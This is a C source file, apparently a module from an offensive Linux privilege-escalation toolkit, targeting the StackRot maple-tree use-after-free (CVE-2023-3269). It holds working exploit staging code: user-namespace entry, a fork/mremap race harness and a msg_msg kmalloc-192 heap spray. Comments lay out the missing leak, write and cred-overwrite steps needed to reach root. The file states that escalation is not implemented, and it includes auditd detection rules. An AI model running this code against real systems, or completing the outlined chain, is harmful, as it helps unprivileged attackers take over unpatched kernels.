Files
SKELETONKEY/modules/stackrot_cve_2023_3269/iamroot_modules.c
T
leviathan 3015e71ea3 modules: port final 2 detect-only modules (xtcompat + stackrot)
netfilter_xtcompat (CVE-2021-22555): +597 LoC — Option B
    Andy Nguyen's IPT_SO_SET_REPLACE 4-byte OOB write trigger;
    msg_msg kmalloc-2k spray + sk_buff sidecar; MSG_COPY witness
    + slabinfo delta. No leak→modprobe_path chain (per-kernel
    offsets refused), honest EXPLOIT_FAIL with continuation
    roadmap.

  stackrot (CVE-2023-3269): +619 LoC — Option C
    Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs
    fork+fault) with cpu pinning + 3s budget; kmalloc-192 spray
    for anon_vma/anon_vma_chain; race-iteration + signal
    breadcrumb to /tmp/iamroot-stackrot.log. Honest reliability
    note in module header: <1% race-win/run on a vulnerable
    kernel — the public PoC averages minutes-to-hours and needs
    a much wider VMA staging matrix to be reliable.

Both refuse cleanly on Debian 6.12.86 (kctf-mgr); build clean.

This closes out the detect-only → LPE port across the corpus.
All 22 registered modules now either fire a real primitive or
refuse honestly per the verified-vs-claimed bar.
2026-05-16 21:31:21 -04:00

751 lines
28 KiB
C

/*
* stackrot_cve_2023_3269 — IAMROOT module
*
* "Stack Rot": UAF in maple-tree-based VMA splitting. The maple
* tree replaced the rbtree-based VMA store in 6.1; during
* __vma_adjust() / split, the kernel could write to a maple node
* after it was freed via RCU, leaving anon_vma references dangling
* across the grace period. Exploitable for kernel R/W → cred
* overwrite.
*
* Discovered by Ruihan Li (Peking University), Jul 2023. Famous
* because it was the first significant exploit landed against the
* (then-recently-merged) maple tree code, and because the original
* disclosure included a public PoC that worked on default-config
* Ubuntu 23.04. The full public PoC is ~1000 lines of maple-tree
* state management + RCU-grace-period timing and depends on
* per-kernel-build offsets for init_task / anon_vma / cred.
*
* STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
* userns-reach, race harness (mremap()/munmap() vs concurrent
* fork/fault), msg_msg slab spray, and empirical witness pieces;
* we do NOT carry the read primitive (vmemmap leak via msg_msg
* MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
* offsets (init_task, anon_vma, cred layout) that vary by build
* and would be fabricated without a real leak.
*
* Per repo policy ("verified-vs-claimed"): we run the trigger,
* record empirical signals (slabinfo delta on kmalloc-192, child
* signal disposition, race iteration count), and return
* IAMROOT_EXPLOIT_FAIL with a continuation roadmap. A SIGSEGV/
* SIGBUS/SIGKILL in the race child IS recorded but does NOT get
* upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
* does, and we do not currently demonstrate that.
*
* Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
* 6.3.x : K >= 6.3.10
* 6.1.x : K >= 6.1.37 (LTS — most relevant)
* mainline 6.4-rc4+
*
* Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched.
*
* Preconditions:
* - v.major >= 6 and v.minor in [1, 4] (4 may straddle the fix)
* - maple tree in use (CONFIG_MAPLE_TREE; on by default 6.1+)
* - /proc/self/maps readable (sanity)
* - unprivileged_userns_clone allowed — namespace context improves
* groom predictability but the bug is reachable without it
*
* Coverage rationale: 2023 mm-class bug. Different family than our
* netfilter-heavy 2022-2024 modules — broadens the corpus shape.
* Affects the 6.1 LTS kernels still widely deployed.
*/
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>
#include <stdatomic.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#ifdef __linux__
# include <sched.h>
# include <sys/mman.h>
# include <sys/syscall.h>
# include <sys/ipc.h>
# include <sys/msg.h>
# include <linux/sched.h>
#endif
/* macOS clangd lacks the Linux mm/syscall headers — guard fallbacks. */
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
#ifndef MAP_GROWSDOWN
#define MAP_GROWSDOWN 0x00100
#endif
#ifndef MAP_FIXED_NOREPLACE
#define MAP_FIXED_NOREPLACE 0x100000
#endif
#ifndef MREMAP_MAYMOVE
#define MREMAP_MAYMOVE 1
#endif
static const struct kernel_patched_from stackrot_patched_branches[] = {
{6, 1, 37},
{6, 3, 10},
{6, 4, 0}, /* mainline */
};
static const struct kernel_range stackrot_range = {
.patched_from = stackrot_patched_branches,
.n_patched_from = sizeof(stackrot_patched_branches) /
sizeof(stackrot_patched_branches[0]),
};
/* ---- Detect ------------------------------------------------------- */
/* Sanity check: maple-tree-era kernels expose /proc/self/maps; if it's
* not readable here, something exotic is going on (selinux, seccomp,
* chroot without /proc) and the bug is not reachable. */
static bool proc_self_maps_readable(void)
{
int fd = open("/proc/self/maps", O_RDONLY);
if (fd < 0) return false;
char b[64];
ssize_t r = read(fd, b, sizeof b);
close(fd);
return r > 0;
}
/* On 6.1+ the maple tree is the only VMA store — we can't directly
* grep for it from userspace, but /proc/self/maps being readable plus
* a v.major>=6 / v.minor>=1 release is the proxy we use. */
static bool maple_tree_variant_present(const struct kernel_version *v)
{
if (v->major > 6) return true;
if (v->major == 6 && v->minor >= 1) return true;
return false;
}
static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
{
struct kernel_version v;
if (!kernel_version_current(&v)) {
fprintf(stderr, "[!] stackrot: could not parse kernel version\n");
return IAMROOT_TEST_ERROR;
}
/* Bug introduced in 6.1 (when maple tree landed). Pre-6.1 kernels
* use rbtree-based VMAs and don't have this bug. */
if (v.major < 6 || (v.major == 6 && v.minor < 1)) {
if (!ctx->json) {
fprintf(stderr, "[+] stackrot: kernel %s predates maple-tree VMA code (introduced in 6.1)\n",
v.release);
}
return IAMROOT_OK;
}
bool patched = kernel_range_is_patched(&stackrot_range, &v);
if (patched) {
if (!ctx->json) {
fprintf(stderr, "[+] stackrot: kernel %s is patched\n", v.release);
}
return IAMROOT_OK;
}
if (!ctx->json) {
fprintf(stderr, "[!] stackrot: kernel %s in vulnerable range\n", v.release);
fprintf(stderr, "[i] stackrot: mm-class bug — affects default-config kernels; "
"no exotic preconditions\n");
}
return IAMROOT_VULNERABLE;
}
/* ---- Userns reach ------------------------------------------------- */
#ifdef __linux__
static bool write_file(const char *path, const char *s)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, s, strlen(s));
close(fd);
return n == (ssize_t)strlen(s);
}
static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
{
if (unshare(CLONE_NEWUSER) < 0) return false;
/* setgroups=deny is required before writing gid_map without
* CAP_SETGID. */
if (!write_file("/proc/self/setgroups", "deny")) return false;
char map[64];
snprintf(map, sizeof map, "0 %u 1\n", outer_uid);
if (!write_file("/proc/self/uid_map", map)) return false;
snprintf(map, sizeof map, "0 %u 1\n", outer_gid);
if (!write_file("/proc/self/gid_map", map)) return false;
return true;
}
#endif
/* ---- Race-driver state ------------------------------------------- */
/* Page size — fall back to 4 KiB if sysconf is unavailable (won't be on
* any kernel we target). */
#define STACKROT_PAGE 4096UL
/* How large a region to play with for the MAP_GROWSDOWN segment +
* neighbouring VMAs that we mutate with mremap()/munmap(). The
* public PoC uses dozens of adjacent VMAs to force the maple tree
* into the node-rotation path; we ship a configurable knob. */
#define STACKROT_RACE_VMAS 64
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds */
/* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
* 6.1.x; targets vary slightly across kernels (anon_vma itself is
* kmalloc-192 too on 64-bit with default debug-off configs). */
#define STACKROT_SPRAY_QUEUES 16
#define STACKROT_SPRAY_PER_QUEUE 64
#define STACKROT_SPRAY_PAYLOAD 176 /* 192 - 16 (msg_msg header) */
struct ipc_payload {
long mtype;
unsigned char buf[STACKROT_SPRAY_PAYLOAD];
};
static _Atomic int g_race_running;
static _Atomic uint64_t g_race_a_iters;
static _Atomic uint64_t g_race_b_iters;
static _Atomic uint64_t g_race_b_faults;
#ifdef __linux__
/* Pin to a CPU to encourage Thread A and Thread B to land on
* different physical cores (we set complementary masks at thread
* start). Best-effort: failure is non-fatal. */
static void pin_to_cpu(int cpu)
{
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(cpu, &set);
sched_setaffinity(0, sizeof set, &set);
}
/* The race victim region: a MAP_GROWSDOWN-mapped page whose
* neighbours we'll dance around with mremap()/munmap(). We keep a
* couple of anchor pages above and below so the maple tree has to
* resolve splits and rotations rather than degenerate to a single
* leaf insertion.
*
* Layout (low to high VA):
* [anchor_lo] [growsdown_stack] [filler ... ] [anchor_hi]
*
* Thread A repeatedly:
* - mmap a scratch page at a chosen address
* - mremap it to overlap the boundary that triggers __vma_adjust()
* - munmap to free the VMA — this is the codepath whose maple-tree
* state is racy on 6.1.0..6.4-rc4.
*
* Thread B repeatedly:
* - fork() a tiny child that touches the growsdown region (fault) +
* immediately _exit()s. The fork path walks the parent's VMA
* tree and the child's fault path follows anon_vma chains — both
* observe maple-tree node state. Concurrent observation of a
* freed node is the trigger condition for the UAF.
*
* On a vulnerable kernel the race window is microseconds wide and
* the public PoC reports needing thousands to millions of iterations.
*/
struct race_region {
void *anchor_lo;
void *growsdown;
void *anchor_hi;
size_t growsdown_len;
/* Scratch address chosen below the growsdown region so mremap()
* can move pages towards the growsdown boundary. */
uintptr_t scratch_va;
};
static bool race_region_setup(struct race_region *r)
{
memset(r, 0, sizeof *r);
r->growsdown_len = STACKROT_PAGE * 4;
/* Reserve a fixed-address arena far from libc/heap so MAP_FIXED_-
* NOREPLACE mmaps don't collide. 0x70000000 region is reliably
* free on standard distros; for production work this would be
* chosen via /proc/self/maps inspection. */
uintptr_t base = 0x70000000UL;
r->anchor_lo = mmap((void *)base, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE,
-1, 0);
if (r->anchor_lo == MAP_FAILED) {
/* Address might be taken; fall back to letting kernel pick. */
r->anchor_lo = mmap(NULL, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
if (r->anchor_lo == MAP_FAILED) return false;
base = (uintptr_t)r->anchor_lo + STACKROT_PAGE;
} else {
base += STACKROT_PAGE;
}
r->growsdown = mmap((void *)base, r->growsdown_len,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
-1, 0);
if (r->growsdown == MAP_FAILED) {
/* Some kernels reject MAP_GROWSDOWN without a fixed hint; retry. */
r->growsdown = mmap(NULL, r->growsdown_len,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
-1, 0);
if (r->growsdown == MAP_FAILED) return false;
base = (uintptr_t)r->growsdown + r->growsdown_len;
} else {
base += r->growsdown_len;
}
r->anchor_hi = mmap((void *)base, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
if (r->anchor_hi == MAP_FAILED) return false;
/* Touch each region so the kernel actually populates the
* anon_vma chain (anon_vma is allocated lazily on first fault). */
((volatile char *)r->anchor_lo)[0] = 1;
((volatile char *)r->growsdown)[r->growsdown_len - 1] = 1;
((volatile char *)r->anchor_hi)[0] = 1;
r->scratch_va = (uintptr_t)r->growsdown - STACKROT_PAGE;
return true;
}
static void race_region_teardown(struct race_region *r)
{
if (r->anchor_lo && r->anchor_lo != MAP_FAILED)
munmap(r->anchor_lo, STACKROT_PAGE);
if (r->growsdown && r->growsdown != MAP_FAILED)
munmap(r->growsdown, r->growsdown_len);
if (r->anchor_hi && r->anchor_hi != MAP_FAILED)
munmap(r->anchor_hi, STACKROT_PAGE);
}
/* Thread A: trigger the maple-tree node-rotation path by repeatedly
* mapping, mremap-extending toward the growsdown boundary, and
* munmapping. The exact ordering (the node-rotation must happen
* while a parallel reader is in the RCU read-side critical section)
* is what makes this race hard. */
static void *race_thread_a(void *arg)
{
struct race_region *r = (struct race_region *)arg;
pin_to_cpu(0);
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
/* mmap a scratch page just below the growsdown region. */
void *scratch = mmap((void *)r->scratch_va, STACKROT_PAGE,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (scratch == MAP_FAILED) {
sched_yield();
continue;
}
((volatile char *)scratch)[0] = 2;
/* mremap to a new VA (forces VMA split + maple-tree mutation). */
void *moved = mremap(scratch, STACKROT_PAGE, STACKROT_PAGE * 2,
MREMAP_MAYMOVE);
if (moved != MAP_FAILED) {
((volatile char *)moved)[0] = 3;
munmap(moved, STACKROT_PAGE * 2);
} else {
munmap(scratch, STACKROT_PAGE);
}
atomic_fetch_add_explicit(&g_race_a_iters, 1, memory_order_relaxed);
sched_yield();
}
return NULL;
}
/* Thread B: spawn a short-lived child that faults the growsdown
* region, then _exit. fork() copies the parent's VMA tree (touches
* every maple-tree node and anon_vma chain) — racing against
* Thread A's munmap, the child can observe a freed node. The page
* fault inside the child closes the loop: the bug manifests as a
* read of stale anon_vma->root or anon_vma_chain->same_vma. */
static void *race_thread_b(void *arg)
{
struct race_region *r = (struct race_region *)arg;
pin_to_cpu(1);
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
pid_t pid = fork();
if (pid == 0) {
/* Child: brief, deterministic fault sequence. */
volatile char *p = (volatile char *)r->growsdown;
char sink = 0;
for (size_t off = 0; off < r->growsdown_len; off += STACKROT_PAGE) {
sink ^= p[off];
}
(void)sink;
_exit(0);
}
if (pid > 0) {
int status = 0;
waitpid(pid, &status, 0);
if (WIFSIGNALED(status)) {
/* Child died on a fault — interesting signal for
* empirical witness. The race-driver caller polls
* this counter. */
atomic_fetch_add_explicit(&g_race_b_faults, 1,
memory_order_relaxed);
}
atomic_fetch_add_explicit(&g_race_b_iters, 1,
memory_order_relaxed);
}
sched_yield();
}
return NULL;
}
/* ---- Groom skeleton ---------------------------------------------- */
/* msg_msg sysv spray for kmalloc-192. Tagged with "IAMROOT_" cookie
* so a forensic look at /proc/slabinfo / KASAN dumps shows our
* fingerprint. */
static int spray_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x4943; /* 'IC' */
memset(p.buf, 0x49, sizeof p.buf);
memcpy(p.buf, "IAMROOT_", 8);
int created = 0;
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (q < 0) { queues[i] = -1; continue; }
queues[i] = q;
created++;
for (int j = 0; j < STACKROT_SPRAY_PER_QUEUE; j++) {
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
}
}
return created;
}
static void drain_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
{
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
}
}
/* Read /proc/slabinfo for kmalloc-192 active count. Used as the
* primary empirical witness: a successful UAF + refill perturbs
* this counter in a way that's distinguishable from idle drift. */
static long slab_active_kmalloc_192(void)
{
FILE *f = fopen("/proc/slabinfo", "r");
if (!f) return -1;
char line[512];
long active = -1;
while (fgets(line, sizeof line, f)) {
if (strncmp(line, "kmalloc-192 ", 12) == 0) {
char name[64];
long act = 0, num = 0;
if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
active = act;
}
break;
}
}
fclose(f);
return active;
}
#endif /* __linux__ */
/* ---- Exploit driver ---------------------------------------------- */
#ifdef __linux__
static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
{
/* 1. Refuse-gate: re-call detect() and short-circuit. */
iamroot_result_t pre = stackrot_detect(ctx);
if (pre == IAMROOT_OK) {
fprintf(stderr, "[+] stackrot: kernel not vulnerable; refusing exploit\n");
return IAMROOT_OK;
}
if (pre != IAMROOT_VULNERABLE) {
fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n");
return pre;
}
if (geteuid() == 0) {
fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n");
return IAMROOT_OK;
}
if (!proc_self_maps_readable()) {
fprintf(stderr, "[-] stackrot: /proc/self/maps not readable — exotic env, "
"cannot drive the race\n");
return IAMROOT_PRECOND_FAIL;
}
{
struct kernel_version v;
if (!kernel_version_current(&v) || !maple_tree_variant_present(&v)) {
fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n");
return IAMROOT_PRECOND_FAIL;
}
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
}
uid_t outer_uid = getuid();
gid_t outer_gid = getgid();
signal(SIGPIPE, SIG_IGN);
pid_t child = fork();
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
if (child == 0) {
/* 2. Userns reach. Bug is reachable without it, but userns
* + uid_map=0 makes the groom more predictable (fewer
* competing kmalloc-192 allocations from the parent
* namespace's tooling). */
if (!enter_userns(outer_uid, outer_gid)) {
fprintf(stderr, "[~] stackrot: enter_userns failed — continuing without "
"namespace isolation (bug is still reachable)\n");
}
/* 3. Race region. */
struct race_region region;
if (!race_region_setup(&region)) {
fprintf(stderr, "[-] stackrot: race_region_setup failed: %s\n",
strerror(errno));
_exit(22);
}
/* 4. Groom: pre-populate kmalloc-192 with msg_msg payloads
* BEFORE the race so the freed slot gets recycled with
* attacker-controlled bytes when the bug fires. */
int queues[STACKROT_SPRAY_QUEUES] = {0};
int n_queues = spray_anon_vma_slab(queues);
if (n_queues == 0) {
fprintf(stderr, "[-] stackrot: msg_msg spray produced 0 queues\n");
race_region_teardown(&region);
_exit(23);
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: kmalloc-192 spray seeded %d queues x %d msgs\n",
n_queues, STACKROT_SPRAY_PER_QUEUE);
}
long slab_pre = slab_active_kmalloc_192();
/* 5. Run the race for a bounded time budget. */
atomic_store(&g_race_running, 1);
atomic_store(&g_race_a_iters, 0);
atomic_store(&g_race_b_iters, 0);
atomic_store(&g_race_b_faults, 0);
pthread_t ta, tb;
if (pthread_create(&ta, NULL, race_thread_a, &region) != 0 ||
pthread_create(&tb, NULL, race_thread_b, &region) != 0) {
fprintf(stderr, "[-] stackrot: pthread_create failed\n");
atomic_store(&g_race_running, 0);
drain_anon_vma_slab(queues);
race_region_teardown(&region);
_exit(24);
}
sleep(STACKROT_RACE_TIME_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
long slab_post = slab_active_kmalloc_192();
uint64_t a_iters = atomic_load(&g_race_a_iters);
uint64_t b_iters = atomic_load(&g_race_b_iters);
uint64_t b_faults = atomic_load(&g_race_b_faults);
/* 6. Empirical witness breadcrumb. */
FILE *log = fopen("/tmp/iamroot-stackrot.log", "w");
if (log) {
fprintf(log,
"stackrot race harness:\n"
" thread_a_iters = %llu (mremap/munmap)\n"
" thread_b_iters = %llu (fork+fault)\n"
" thread_b_faults = %llu (child died on signal)\n"
" slab_kmalloc192_pre = %ld\n"
" slab_kmalloc192_post = %ld\n"
" slab_delta = %ld\n"
" spray_queues = %d\n"
" spray_per_queue = %d\n"
" growsdown_len = %zu\n"
"Note: this run did NOT attempt cred overwrite (no leak\n"
"primitive; per-kernel offsets unknown). See module .c\n"
"for the continuation roadmap.\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)b_faults,
slab_pre, slab_post,
(slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
n_queues, STACKROT_SPRAY_PER_QUEUE,
(size_t)region.growsdown_len);
fclose(log);
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: race ran for %ds — A=%llu B=%llu B_faults=%llu\n",
STACKROT_RACE_TIME_BUDGET,
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)b_faults);
fprintf(stderr, "[*] stackrot: kmalloc-192 active: pre=%ld post=%ld\n",
slab_pre, slab_post);
}
/* Hold the spray so the kernel observes refilled slots during
* any in-flight RCU grace periods that started during the race. */
usleep(200 * 1000);
drain_anon_vma_slab(queues);
race_region_teardown(&region);
/* 7. Continuation roadmap — what would land EXPLOIT_OK.
*
* TODO(leak): replace one of the spray queues with a
* msgrcv(..., MSG_COPY|IPC_NOWAIT) probe and scan the
* returned buffer for non-cookie bytes. The bug's UAF
* write leaves a kernel pointer (anon_vma->root or the
* mas->node parent) at a known offset inside the freed
* slab slot. Recover {kbase, init_task} via that leak.
*
* TODO(write): with kbase known, repeat the trigger but
* plant a fake anon_vma_chain whose `rb_node` parent
* pointer points at &current->cred — the maple-tree
* rotation writes a controlled value into that location.
* Crafting the fake AVC requires offset of anon_vma_chain
* fields per kernel build (CONFIG_DEBUG_LIST/KFENCE/etc.
* perturb the layout — must NOT be hardcoded).
*
* TODO(overwrite): land &init_cred over current->cred so
* the next call to a permission check sees uid==0.
*
* None of these are implemented today. We exit 30 to
* flag "trigger ran cleanly, no escalation".
*/
_exit(30);
}
/* PARENT */
int status = 0;
pid_t w = waitpid(child, &status, 0);
if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
if (WIFSIGNALED(status)) {
int sig = WTERMSIG(status);
if (!ctx->json) {
fprintf(stderr, "[!] stackrot: race child killed by signal %d "
"(consistent with UAF firing under KASAN)\n", sig);
fprintf(stderr, "[~] stackrot: empirical signal recorded; no cred\n"
" overwrite primitive — NOT claiming EXPLOIT_OK.\n"
" See /tmp/iamroot-stackrot.log + dmesg for witnesses.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] stackrot: child terminated abnormally (status=0x%x)\n",
status);
return IAMROOT_EXPLOIT_FAIL;
}
int rc = WEXITSTATUS(status);
if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
if (rc != 30) {
fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: race harness ran to completion.\n");
fprintf(stderr, "[~] stackrot: read/write/cred-overwrite primitives NOT\n"
" implemented (per-kernel offsets; see module .c TODO\n"
" blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
#endif /* __linux__ */
static iamroot_result_t stackrot_exploit(const struct iamroot_ctx *ctx)
{
#ifdef __linux__
return stackrot_exploit_linux(ctx);
#else
(void)ctx;
fprintf(stderr, "[-] stackrot: Linux-only module; cannot run on this host\n");
return IAMROOT_PRECOND_FAIL;
#endif
}
/* ---- Cleanup ----------------------------------------------------- */
static iamroot_result_t stackrot_cleanup(const struct iamroot_ctx *ctx)
{
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: cleaning up race-harness breadcrumb\n");
}
if (unlink("/tmp/iamroot-stackrot.log") < 0 && errno != ENOENT) {
/* harmless */
}
/* The race harness's threads + msg queues live in the child
* process which has already exited; nothing else to drain. */
return IAMROOT_OK;
}
/* ---- Detection rules --------------------------------------------- */
static const char stackrot_auditd[] =
"# StackRot (CVE-2023-3269) — auditd detection rules\n"
"# The trigger is mremap/munmap/mprotect bursts against MAP_GROWSDOWN\n"
"# stacks, combined with unshare(CLONE_NEWUSER). Each individual call\n"
"# is benign — flag the *combination* by correlating these keys with a\n"
"# subsequent kernel oops or KASAN message in dmesg.\n"
"-a always,exit -F arch=b64 -S unshare -k iamroot-stackrot-userns\n"
"-a always,exit -F arch=b64 -S mremap -k iamroot-stackrot-mremap\n"
"-a always,exit -F arch=b64 -S mprotect -k iamroot-stackrot-mprotect\n"
"-a always,exit -F arch=b64 -S munmap -F success=1 -k iamroot-stackrot-munmap\n";
const struct iamroot_module stackrot_module = {
.name = "stackrot",
.cve = "CVE-2023-3269",
.summary = "maple-tree VMA-split UAF (StackRot) → kernel R/W → cred overwrite",
.family = "stackrot",
.kernel_range = "6.1 ≤ K < 6.4-rc4, backports: 6.3.10 / 6.1.37 (LTS)",
.detect = stackrot_detect,
.exploit = stackrot_exploit,
.mitigate = NULL,
.cleanup = stackrot_cleanup,
.detect_auditd = stackrot_auditd,
.detect_sigma = NULL,
.detect_yara = NULL,
.detect_falco = NULL,
};
void iamroot_register_stackrot(void)
{
iamroot_register(&stackrot_module);
}